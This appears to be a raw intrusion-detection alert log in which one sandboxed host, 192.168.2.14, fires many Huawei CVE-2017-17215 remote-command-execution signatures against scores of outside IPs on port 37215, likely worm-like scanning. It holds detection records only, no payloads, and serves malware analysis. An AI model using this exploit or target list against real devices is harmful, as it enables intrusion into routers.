                                            06/14/24-10:44:10.564979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4040237215192.168.2.14197.10.174.76
                                            06/14/24-10:44:18.762106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061637215192.168.2.14197.189.202.208
                                            06/14/24-10:44:35.177469TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4537037215192.168.2.14197.244.119.123
                                            06/14/24-10:44:35.177865TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172037215192.168.2.1441.104.19.45
                                            06/14/24-10:43:48.019663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4498637215192.168.2.1441.86.223.133
                                            06/14/24-10:43:58.273328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5092237215192.168.2.14156.5.236.159
                                            06/14/24-10:43:39.790892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316237215192.168.2.14156.249.23.235
                                            06/14/24-10:43:37.762783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510037215192.168.2.14156.248.254.202
                                            06/14/24-10:44:14.681939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4917437215192.168.2.14156.205.236.61
                                            06/14/24-10:43:36.704674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142237215192.168.2.14156.195.211.251
                                            06/14/24-10:44:20.828016TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092237215192.168.2.14197.81.99.4
                                            06/14/24-10:43:45.988923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040637215192.168.2.14197.113.101.161
                                            06/14/24-10:44:22.880002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760437215192.168.2.14156.92.54.101
                                            06/14/24-10:43:39.791772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5449037215192.168.2.1441.192.253.160
                                            06/14/24-10:43:50.111492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5374637215192.168.2.14197.255.191.33
                                            06/14/24-10:43:41.850582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4845837215192.168.2.14156.22.246.78
                                            06/14/24-10:43:58.289191TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5503837215192.168.2.14197.229.208.43
                                            06/14/24-10:44:24.934993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5868637215192.168.2.14156.221.93.93
                                            06/14/24-10:43:41.905919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4452437215192.168.2.1441.109.207.251
                                            06/14/24-10:43:52.164909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4212637215192.168.2.14156.216.131.189
                                            06/14/24-10:43:52.148029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3335837215192.168.2.14197.21.40.198
                                            06/14/24-10:43:54.182180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216837215192.168.2.14156.156.84.225
                                            06/14/24-10:44:18.762479TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4440037215192.168.2.1441.13.77.117
                                            06/14/24-10:44:18.762746TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577237215192.168.2.1441.139.93.154
                                            06/14/24-10:43:36.717019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5948837215192.168.2.14156.125.27.234
                                            06/14/24-10:44:02.383037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5066437215192.168.2.14156.245.255.195
                                            06/14/24-10:44:00.324029TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3404037215192.168.2.14197.23.241.220
                                            06/14/24-10:43:41.850017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4766437215192.168.2.14197.207.12.125
                                            06/14/24-10:43:45.969226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4026637215192.168.2.1441.57.70.239
                                            06/14/24-10:44:02.366059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3799237215192.168.2.14156.42.176.191
                                            06/14/24-10:44:22.860151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079037215192.168.2.14197.223.182.183
                                            06/14/24-10:43:37.772454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5946437215192.168.2.14197.227.95.173
                                            06/14/24-10:43:41.850508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3666837215192.168.2.14197.151.161.254
                                            06/14/24-10:44:04.420774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355637215192.168.2.14156.252.198.195
                                            06/14/24-10:44:31.052838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572837215192.168.2.1441.42.251.162
                                            06/14/24-10:43:48.031868TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4155037215192.168.2.1441.102.175.107
                                            06/14/24-10:44:24.916139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4828637215192.168.2.14197.87.184.127
                                            06/14/24-10:43:48.020425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3636637215192.168.2.14197.58.77.143
                                            06/14/24-10:44:20.805750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4221237215192.168.2.1441.168.62.237
                                            06/14/24-10:44:06.471575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5197037215192.168.2.14156.129.218.11
                                            06/14/24-10:44:14.671160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5241237215192.168.2.14156.247.203.24
                                            06/14/24-10:43:48.019972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163437215192.168.2.14197.54.200.89
                                            06/14/24-10:43:37.763486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4793037215192.168.2.14197.194.176.215
                                            06/14/24-10:44:12.616045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5006037215192.168.2.14197.182.107.173
                                            06/14/24-10:43:36.704115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837237215192.168.2.14197.45.160.57
                                            06/14/24-10:43:37.763022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5768637215192.168.2.14197.43.135.32
                                            06/14/24-10:43:52.164732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150637215192.168.2.1441.22.69.134
                                            06/14/24-10:43:48.028743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4158237215192.168.2.1441.204.52.97
                                            06/14/24-10:44:02.383590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165237215192.168.2.1441.241.255.184
                                            06/14/24-10:44:04.423654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4117437215192.168.2.1441.96.10.0
                                            06/14/24-10:43:52.160780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844837215192.168.2.14197.1.190.70
                                            06/14/24-10:44:02.382903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5575037215192.168.2.1441.58.191.201
                                            06/14/24-10:43:58.288939TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5289637215192.168.2.14197.47.31.61
                                            06/14/24-10:43:52.160042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3646837215192.168.2.14197.52.176.13
                                            06/14/24-10:44:33.131736TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5597637215192.168.2.1441.217.177.191
                                            06/14/24-10:44:10.547466TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5772037215192.168.2.1441.74.217.92
                                            06/14/24-10:44:04.412062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021637215192.168.2.14197.208.92.112
                                            06/14/24-10:44:06.450492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5456237215192.168.2.1441.41.24.236
                                            06/14/24-10:43:36.729890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5971437215192.168.2.14156.165.26.177
                                            06/14/24-10:43:50.071396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4965637215192.168.2.1441.134.211.61
                                            06/14/24-10:43:43.967486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5086437215192.168.2.14156.90.91.0
                                            06/14/24-10:43:45.967799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3304637215192.168.2.14156.61.13.199
                                            06/14/24-10:44:10.565397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3804037215192.168.2.1441.160.126.8
                                            06/14/24-10:43:39.809470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5236237215192.168.2.1441.74.86.49
                                            06/14/24-10:43:52.149474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4501037215192.168.2.14197.137.212.68
                                            06/14/24-10:44:14.682259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3633437215192.168.2.14156.146.90.116
                                            06/14/24-10:44:33.152728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6017037215192.168.2.14156.78.41.22
                                            06/14/24-10:43:34.675324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5196037215192.168.2.14197.168.230.94
                                            06/14/24-10:43:56.227370TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4490437215192.168.2.14156.202.185.218
                                            06/14/24-10:43:34.662414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452237215192.168.2.14156.231.88.25
                                            06/14/24-10:44:04.406962TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5051037215192.168.2.1441.231.237.25
                                            06/14/24-10:44:02.384585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534637215192.168.2.1441.31.108.24
                                            06/14/24-10:44:29.013138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4250037215192.168.2.14197.102.79.30
                                            06/14/24-10:44:16.737666TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5720637215192.168.2.14156.167.203.163
                                            06/14/24-10:43:54.201010TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5941637215192.168.2.14156.15.228.73
                                            06/14/24-10:43:43.941004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3403637215192.168.2.14197.155.111.243
                                            06/14/24-10:43:48.032807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658637215192.168.2.14197.238.178.136
                                            06/14/24-10:44:02.367026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5504237215192.168.2.1441.204.119.150
                                            06/14/24-10:44:16.715856TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5858437215192.168.2.14197.124.64.96
                                            06/14/24-10:44:08.504038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5183637215192.168.2.14197.110.15.255
                                            06/14/24-10:44:26.997157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4946637215192.168.2.14156.97.189.218
                                            06/14/24-10:44:20.803535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6073237215192.168.2.14156.253.43.104
                                            06/14/24-10:43:36.704091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5413837215192.168.2.14156.62.249.174
                                            06/14/24-10:44:08.520543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4438837215192.168.2.14156.78.146.210
                                            06/14/24-10:44:18.765183TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5081637215192.168.2.14197.166.32.48
                                            06/14/24-10:44:35.180911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5453237215192.168.2.14156.7.88.115
                                            06/14/24-10:43:41.900139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3450637215192.168.2.14197.158.248.80
                                            06/14/24-10:43:50.074245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278237215192.168.2.1441.233.165.8
                                            06/14/24-10:44:04.425151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5040037215192.168.2.14156.219.73.55
                                            06/14/24-10:44:08.517427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994037215192.168.2.14156.124.147.197
                                            06/14/24-10:44:18.764900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077237215192.168.2.14156.146.42.16
                                            06/14/24-10:43:50.073823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738037215192.168.2.14156.176.181.253
                                            06/14/24-10:43:36.704602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3825237215192.168.2.14156.121.211.4
                                            06/14/24-10:44:26.977956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865037215192.168.2.1441.69.228.34
                                            06/14/24-10:43:36.722379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4588837215192.168.2.14156.128.84.72
                                            06/14/24-10:43:48.021881TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4786237215192.168.2.14156.211.164.111
                                            06/14/24-10:43:43.942140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5904237215192.168.2.14156.49.160.16
                                            06/14/24-10:44:10.546729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5455237215192.168.2.1441.151.45.197
                                            06/14/24-10:43:41.907364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4713837215192.168.2.1441.38.204.237
                                            06/14/24-10:44:04.424281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6089237215192.168.2.14197.163.24.154
                                            06/14/24-10:43:52.165126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5315837215192.168.2.1441.57.89.89
                                            06/14/24-10:44:12.616253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4225237215192.168.2.14197.244.170.93
                                            06/14/24-10:44:14.681414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5274837215192.168.2.14156.30.247.88
                                            06/14/24-10:43:52.150721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4229637215192.168.2.14197.167.92.14
                                            06/14/24-10:44:20.806126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839837215192.168.2.1441.80.90.223
                                            06/14/24-10:43:36.703025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5662837215192.168.2.1441.7.73.158
                                            06/14/24-10:43:48.030352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4907837215192.168.2.1441.251.72.240
                                            06/14/24-10:44:04.411880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4722237215192.168.2.14156.233.56.2
                                            06/14/24-10:44:08.503436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981037215192.168.2.1441.52.165.213
                                            06/14/24-10:43:54.201199TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131637215192.168.2.14197.172.10.106
                                            06/14/24-10:44:18.779377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774237215192.168.2.1441.48.74.165
                                            06/14/24-10:44:24.917918TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5591037215192.168.2.14197.126.146.123
                                            06/14/24-10:43:50.074494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4801037215192.168.2.14156.73.4.181
                                            06/14/24-10:43:41.896426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3578437215192.168.2.1441.188.209.121
                                            06/14/24-10:44:29.025697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6042437215192.168.2.14156.1.186.227
                                            06/14/24-10:43:36.703282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5583437215192.168.2.14197.81.245.28
                                            06/14/24-10:44:22.858514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4374037215192.168.2.14156.16.102.124
                                            06/14/24-10:44:20.827840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4995037215192.168.2.14156.11.71.189
                                            06/14/24-10:43:39.810053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4367037215192.168.2.14197.172.35.102
                                            06/14/24-10:43:48.016630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5424437215192.168.2.14197.3.170.204
                                            06/14/24-10:44:06.449542TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958437215192.168.2.1441.168.200.59
                                            06/14/24-10:44:33.149990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265637215192.168.2.14156.155.252.187
                                            06/14/24-10:43:58.277293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6098837215192.168.2.14156.93.242.170
                                            06/14/24-10:44:00.324336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3608037215192.168.2.14197.175.241.185
                                            06/14/24-10:44:12.614218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739637215192.168.2.14156.195.80.230
                                            06/14/24-10:44:08.518577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4749037215192.168.2.1441.103.148.80
                                            06/14/24-10:44:04.424445TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5777637215192.168.2.1441.222.130.170
                                            06/14/24-10:44:06.469735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076437215192.168.2.1441.251.167.164
                                            06/14/24-10:43:50.073715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4450637215192.168.2.1441.39.166.107
                                            06/14/24-10:44:16.736440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3508837215192.168.2.14197.239.162.126
                                            06/14/24-10:43:36.699039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773037215192.168.2.14197.253.193.58
                                            06/14/24-10:43:58.295069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4641237215192.168.2.14197.26.199.14
                                            06/14/24-10:43:58.274929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5817837215192.168.2.14156.131.129.202
                                            06/14/24-10:44:22.882736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568037215192.168.2.14197.183.99.9
                                            06/14/24-10:44:26.985644TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888637215192.168.2.1441.128.132.191
                                            06/14/24-10:44:14.682872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455837215192.168.2.14197.31.227.10
                                            06/14/24-10:43:54.185782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4935037215192.168.2.1441.118.159.144
                                            06/14/24-10:44:24.917739TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018037215192.168.2.14156.102.80.81
                                            06/14/24-10:43:54.182806TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287837215192.168.2.14156.136.41.45
                                            06/14/24-10:43:39.813131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3829437215192.168.2.14197.45.159.107
                                            06/14/24-10:43:48.027593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682637215192.168.2.14197.159.48.83
                                            06/14/24-10:44:18.762409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3739037215192.168.2.14156.133.96.153
                                            06/14/24-10:44:04.412158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3451037215192.168.2.1441.205.248.204
                                            06/14/24-10:44:00.323489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091837215192.168.2.14156.196.139.60
                                            06/14/24-10:44:16.733467TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5977237215192.168.2.14156.61.198.211
                                            06/14/24-10:43:39.789594TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4114037215192.168.2.14156.249.180.127
                                            06/14/24-10:43:34.679066TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4139037215192.168.2.14197.42.14.45
                                            06/14/24-10:43:37.760173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572837215192.168.2.14156.20.201.23
                                            06/14/24-10:44:10.564212TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5886637215192.168.2.14197.228.157.197
                                            06/14/24-10:43:43.942557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739037215192.168.2.1441.254.255.107
                                            06/14/24-10:44:12.625125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5900437215192.168.2.1441.226.224.51
                                            06/14/24-10:43:37.761638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5205237215192.168.2.14197.81.163.144
                                            06/14/24-10:43:37.763186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5629237215192.168.2.1441.200.247.17
                                            06/14/24-10:44:04.411853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3558837215192.168.2.1441.173.56.153
                                            06/14/24-10:44:18.766389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3730237215192.168.2.1441.149.63.217
                                            06/14/24-10:43:34.660597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809237215192.168.2.14197.156.162.157
                                            06/14/24-10:44:24.916105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5259637215192.168.2.1441.50.30.60
                                            06/14/24-10:44:16.734199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022037215192.168.2.14156.25.155.213
                                            06/14/24-10:44:20.828751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851437215192.168.2.14197.14.251.237
                                            06/14/24-10:44:31.082527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399837215192.168.2.14156.24.81.86
                                            06/14/24-10:44:14.671625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3404837215192.168.2.14156.43.163.96
                                            06/14/24-10:44:14.670251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4965637215192.168.2.14197.164.3.32
                                            06/14/24-10:43:48.033228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828237215192.168.2.14197.209.169.188
                                            06/14/24-10:44:29.012304TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5409237215192.168.2.14156.65.227.103
                                            06/14/24-10:44:24.933581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3278437215192.168.2.14156.243.64.44
                                            06/14/24-10:44:18.779702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3505437215192.168.2.14156.34.54.48
                                            06/14/24-10:43:37.760895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3832037215192.168.2.14197.247.210.248
                                            06/14/24-10:43:39.810632TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699837215192.168.2.1441.179.220.183
                                            06/14/24-10:43:48.020649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4600237215192.168.2.1441.145.182.29
                                            06/14/24-10:44:31.084082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5498237215192.168.2.14197.135.39.78
                                            06/14/24-10:44:00.342296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4761637215192.168.2.1441.105.109.197
                                            06/14/24-10:43:52.143302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5084437215192.168.2.14156.168.188.173
                                            06/14/24-10:44:00.340827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287037215192.168.2.1441.245.136.153
                                            06/14/24-10:44:02.383949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4411437215192.168.2.14156.45.14.174
                                            06/14/24-10:44:29.015119TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4011837215192.168.2.14197.232.134.85
                                            06/14/24-10:44:16.718897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5646637215192.168.2.1441.178.164.190
                                            06/14/24-10:44:20.804073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490637215192.168.2.1441.45.248.192
                                            06/14/24-10:44:26.979535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6077037215192.168.2.14156.16.141.226
                                            06/14/24-10:44:31.055116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5520237215192.168.2.1441.13.222.137
                                            06/14/24-10:43:56.244631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5656637215192.168.2.1441.243.217.128
                                            06/14/24-10:44:12.625410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4014237215192.168.2.1441.198.251.184
                                            06/14/24-10:43:48.022088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3595237215192.168.2.14156.19.226.215
                                            06/14/24-10:43:41.900009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3693437215192.168.2.14197.33.107.160
                                            06/14/24-10:44:12.616730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5837837215192.168.2.14197.223.254.106
                                            06/14/24-10:44:33.131363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089037215192.168.2.14156.39.20.215
                                            06/14/24-10:44:16.716875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4057237215192.168.2.14197.115.173.204
                                            06/14/24-10:43:36.724673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5573437215192.168.2.1441.27.148.16
                                            06/14/24-10:44:33.149186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960437215192.168.2.14156.156.115.237
